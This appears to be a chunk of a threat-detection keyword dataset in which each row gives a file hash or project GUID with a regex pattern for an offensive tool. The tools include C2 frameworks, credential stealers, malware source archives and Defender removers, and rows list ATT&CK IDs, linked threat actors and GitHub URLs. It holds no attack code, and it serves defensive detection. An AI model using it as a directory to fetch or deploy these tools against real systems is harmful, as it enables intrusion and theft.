"*0ab70dccb06b2a6c06c16dd3aeb00140c9eaf4bd178d4edfd3ed662af3fcba13*",".{0,1000}0ab70dccb06b2a6c06c16dd3aeb00140c9eaf4bd178d4edfd3ed662af3fcba13.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21421" "*0ABB9F2A-6913-4174-9431-851F9D3E94B4*",".{0,1000}0ABB9F2A\-6913\-4174\-9431\-851F9D3E94B4.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","21422" "*0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761*",".{0,1000}0ac4490e04a65d571cc7b069b5070a4853516300b8ea43bd304ca484bf68c761.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive 
Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","21425" "*0ac82760-3e0d-4124-bd1c-92c8dab97171*",".{0,1000}0ac82760\-3e0d\-4124\-bd1c\-92c8dab97171.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","21426" "*0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44*",".{0,1000}0acac34993ed96c9c8ba60fd6914937c626330b2e490885fd0b9837e171a3c44.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21427" "*0acf29e9ae705e5518a55e9020f69e9bdc9348d6374d054720b6169cfdc5ca87*",".{0,1000}0acf29e9ae705e5518a55e9020f69e9bdc9348d6374d054720b6169cfdc5ca87.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","21428" "*0acffe2314b3329c3a984cd5b402bf17e1de0305b38d9e1daa5f566182dbef6f*",".{0,1000}0acffe2314b3329c3a984cd5b402bf17e1de0305b38d9e1daa5f566182dbef6f.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#filehash","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","21429" "*0ad1f9bb7c3b296339d3c3f9bb4338b79bfb9f051fbb8749c411c44195e68d35*",".{0,1000}0ad1f9bb7c3b296339d3c3f9bb4338b79bfb9f051fbb8749c411c44195e68d35.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","#filehash","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","21430" "*0ad2c8d20a383ac7007bb531672f8cbb9fe945b8d32eefa061b4ead09ff92ce3*",".{0,1000}0ad2c8d20a383ac7007bb531672f8cbb9fe945b8d32eefa061b4ead09ff92ce3.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","21431" "*0ADFD1F0-7C15-4A22-87B4-F67E046ECD96*",".{0,1000}0ADFD1F0\-7C15\-4A22\-87B4\-F67E046ECD96.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and 
Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","#GUIDproject","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","21433" "*0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49*",".{0,1000}0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21434" "*0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49*",".{0,1000}0ae12dd51a6faf674521da0fbb3cb8aba5425934aee91b6e204386b38505ab49.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21435" "*0ae164e1f157f452b32b06e43b828d792daa447b535b08330f942ade8b87d70b*",".{0,1000}0ae164e1f157f452b32b06e43b828d792daa447b535b08330f942ade8b87d70b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21436" "*0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f*",".{0,1000}0aebcf5b97bf1ae6286c7aa7000f1ee68b063bd9ded6c871c708c8e639793c3f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","21437" "*0aed5355351bc856a6a92d226188bb66a13a8324792fb112f39401e080180e81*",".{0,1000}0aed5355351bc856a6a92d226188bb66a13a8324792fb112f39401e080180e81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21438" "*0aed5bc1f0d272aa57c3a1286499e49633de6f192cbec67f5f7b536d96fefe8e*",".{0,1000}0aed5bc1f0d272aa57c3a1286499e49633de6f192cbec67f5f7b536d96fefe8e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21439" "*0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76*",".{0,1000}0af1e638d78ecb998aa44a6716084ce830af74c68c641bc1634a9841de3caa76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21441" "*0af38acc5d64d86e6519d46d9880a147528eb5fa99dfa456f8ce8009c1dd1d2b*",".{0,1000}0af38acc5d64d86e6519d46d9880a147528eb5fa99dfa456f8ce8009c1dd1d2b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21442" "*0af6b417e2069876a8530e9ca0056ddc12b24f348e1d4a531add0760b8d11236*",".{0,1000}0af6b417e2069876a8530e9ca0056ddc12b24f348e1d4a531add0760b8d11236.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","21444" "*0b0acd531970ccc941de33b65aed8a93a93374fa9d2791fb210e38828098db85*",".{0,1000}0b0acd531970ccc941de33b65aed8a93a93374fa9d2791fb210e38828098db85.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","21446" "*0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65*",".{0,1000}0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21448" "*0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79*",".{0,1000}0b1a6a5a3e7a22a2f68a7b2b83b33117a63f0d6337dddb3d41b250a995210d79.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode 
Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","#filehash","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","21449" "*0b2cf2f9b7ff24e97c75b4791a431011d1e58824491a1e4b63ff6eeae13282cb*",".{0,1000}0b2cf2f9b7ff24e97c75b4791a431011d1e58824491a1e4b63ff6eeae13282cb.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21452" "*0b3472c651db8cc9991a92097c22dc4cab8467aff96591f76fb89bc3af8eadaa*",".{0,1000}0b3472c651db8cc9991a92097c22dc4cab8467aff96591f76fb89bc3af8eadaa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21454" "*0b3502ac778c671bad537e6433a8f58ec4e1f9a7ab34d37a7bb1bf8c08b2dcf7*",".{0,1000}0b3502ac778c671bad537e6433a8f58ec4e1f9a7ab34d37a7bb1bf8c08b2dcf7.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21455" 
"*0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9*",".{0,1000}0b3924b330e85ff7db62e4d7e665397fd04c3b056b135a184aa87fcabbf1fad9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","21456" "*0b41b2fcd0f1a4e913d3efe293f713849d59efebb27bac060ab31bed51ac2f6b*",".{0,1000}0b41b2fcd0f1a4e913d3efe293f713849d59efebb27bac060ab31bed51ac2f6b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21457" "*0b4559dcd86d86e5c0cd54f123fdcf2d7011472a1b134aeb3ed14782a4578111*",".{0,1000}0b4559dcd86d86e5c0cd54f123fdcf2d7011472a1b134aeb3ed14782a4578111.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21459" "*0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f*",".{0,1000}0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - 
T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21460" "*0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f*",".{0,1000}0b506ef32f58ee2b1e5701ca8e13c67584739ab1d00ee4a0c2f532c09a15836f.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21461" "*0b588d69dcb8efba81185ac65ec8a9ac051aaf3309523a01d2d360d2d283a0a7*",".{0,1000}0b588d69dcb8efba81185ac65ec8a9ac051aaf3309523a01d2d360d2d283a0a7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21462" "*0b5aa7a7f74d9fb5251bbff02e7ac43a3cf47be0a2f02d5a208ebd37032d12cf*",".{0,1000}0b5aa7a7f74d9fb5251bbff02e7ac43a3cf47be0a2f02d5a208ebd37032d12cf.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21463" 
"*0b5f0373ab8388f655fe01309ff6a58e96e969d8a94a06b5a05dce11c998f2f0*",".{0,1000}0b5f0373ab8388f655fe01309ff6a58e96e969d8a94a06b5a05dce11c998f2f0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21464" "*0b6a762812a1fbfda681951fbd60bcaa919b99e6e61df84a251f800bb4479a0e*",".{0,1000}0b6a762812a1fbfda681951fbd60bcaa919b99e6e61df84a251f800bb4479a0e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21466" "*0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27*",".{0,1000}0b6c277ada6299603f6af3a2ec7bf7134df0c71d8f45438eeb65a2455d351e27.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","21467" "*0B6D8B01-861E-4CAF-B1C9-6670884381DB*",".{0,1000}0B6D8B01\-861E\-4CAF\-B1C9\-6670884381DB.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/openbullet","1","0","#GUIDproject","N/A","10","10","1569","697","2024-09-02T12:18:29Z","2019-03-26T09:06:32Z","21468" 
"*0b7662a80318e6fe243f57a7a1acd74d310f25a4876dc9a1ddaad9cb164b8ac3*",".{0,1000}0b7662a80318e6fe243f57a7a1acd74d310f25a4876dc9a1ddaad9cb164b8ac3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21471" "*0b76a0444f290530c45bb0e0dda192ef0e316e5e76133e34be07b383880c959c*",".{0,1000}0b76a0444f290530c45bb0e0dda192ef0e316e5e76133e34be07b383880c959c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21472" "*0b793ad164bdf239eec2eb25f1a153a51b9b0e57afd9e3b411621592b224b514*",".{0,1000}0b793ad164bdf239eec2eb25f1a153a51b9b0e57afd9e3b411621592b224b514.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21473" "*0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420*",".{0,1000}0b79812a3202ddcd7f58de6c1912beed92b163a0ad930193b02f134059d8c420.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21474" "*0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b*",".{0,1000}0b8e4ffbabf5f6e7167013a324e67e2a359d35043145eb8af7d8815e7e12242b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","21478" "*0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508*",".{0,1000}0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#filehash","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","21480" "*0b9219328ebf065db9b26c9a189d72c7d0d9c39eb35e9fd2a5fefa54a7f853e4*",".{0,1000}0b9219328ebf065db9b26c9a189d72c7d0d9c39eb35e9fd2a5fefa54a7f853e4.{0,1000}","offensive_tool_keyword","OpenChromeDumps","OpenChrome Dump used with GrabChrome for credential access","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Yanluowang - Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21482" 
"*0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a*",".{0,1000}0ba663873a7926866e3dd717b970f7e651700d00e9d99f667dfd473eafa81b8a.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","#filehash","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","21485" "*0baa85ef3689d4e9c15d6d64dfd4e4b633db4af6bad347eaf06a2f320d82074e*",".{0,1000}0baa85ef3689d4e9c15d6d64dfd4e4b633db4af6bad347eaf06a2f320d82074e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21486" "*0bb4b892f67fdf903ed5e5df2c85c5ccb71669c298736cf24284412de435509a*",".{0,1000}0bb4b892f67fdf903ed5e5df2c85c5ccb71669c298736cf24284412de435509a.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003 - T1649","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","#filehash","N/A","10","9","838","127","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z","21489" "*0bb60287c127bcef5b7018b3b692eb7a91dab1a034fa65780b5e14333a63f62b*",".{0,1000}0bb60287c127bcef5b7018b3b692eb7a91dab1a034fa65780b5e14333a63f62b.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21490" 
"*0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215*",".{0,1000}0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21491" "*0bb88564a22bfd6d9ad6e4d8efa9077792a7b6094c2a0f865d70c43e11507352*",".{0,1000}0bb88564a22bfd6d9ad6e4d8efa9077792a7b6094c2a0f865d70c43e11507352.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21492" "*0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04*",".{0,1000}0bc38984ce64aa213a77c2c9125a68a057f76f354a44060f8342d5375368ef04.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 